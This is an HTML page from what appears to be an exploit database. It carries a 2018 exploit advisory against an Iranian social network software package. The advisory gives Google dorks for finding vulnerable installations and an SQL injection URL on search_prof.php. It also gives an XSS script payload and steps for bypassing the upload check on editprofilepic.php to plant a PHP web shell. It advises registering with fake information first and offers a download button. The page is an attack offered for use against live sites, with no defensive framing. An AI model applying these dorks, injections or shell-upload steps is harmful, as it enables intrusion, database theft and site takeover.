<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-17</title>
    </head>
    <body>
        <center>
                <a  href="https://mr-msa.xyz/guexdb/exploits/exploit-17" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
            
##########################################################
# Title : Iranian Social Network Multiple Exploit
# Date : 12 April 2018
# Tested on : Ubuntu/Windows 10
# Google Dork : inurl:/register.php intitle:شبکه اجتماعی
# Google Dork2 : inurl:/news2.php?id= intitle:شبکه اجتماعی
# Author : GIST
# Vendor : http://sana-net.com/
# Exploit Type : Remote 
# Version : All Version
# CVE : -
###########################################################

Description : 

Iranian Social Network Have Multiple Vulnerablity (Sqli , Xss , File Upload).
We can inject and download database or upload shell.
For using this vulnerabilities first you have to register with fake information then you can use the vulnerabilities

Sql Injection : 

 Url : site.com/search_prof.php?op=3&amp;ostan=1219&amp;vez=1219&amp;sen1=1219&amp;jensu=1219&amp;city=1219&amp;picu=1219&amp;vsalamat=1219'
 
 Request Method : Post
 
 -- response --

HTTP/1.1 200OK
Server nginx/1.4.6 (Ubuntu)
Date: Thu, 10 mar 2016 19:18:47 GMT
Content-Type: text/html
Transfer-Encoding: Chunked
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Thu, 19 Nov 1981 08:51:00 GMT
Cache-Control: no=store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragme: no-cache
Content-encoing: gzip



Xss : 
 URL : site.com/search_prof.php?op=3&amp;ostan=1219&amp;vez=1219&amp;sen1=1219&amp;jensu=1219&amp;city=1219&amp;picu=1219&amp;vsalamat=1219
 commands : &lt;script&gt;alert('Xss')&lt;/script&gt; 
 
 
 
File Upload : 
 URL : /editprofilepic.php
 Method : Post
 Convert .php to .jpg and choose your shell and bypass file to .php with live http header.
 Directory Shell : site.com/images/users/shell.php         </pre>
    </body>
</html>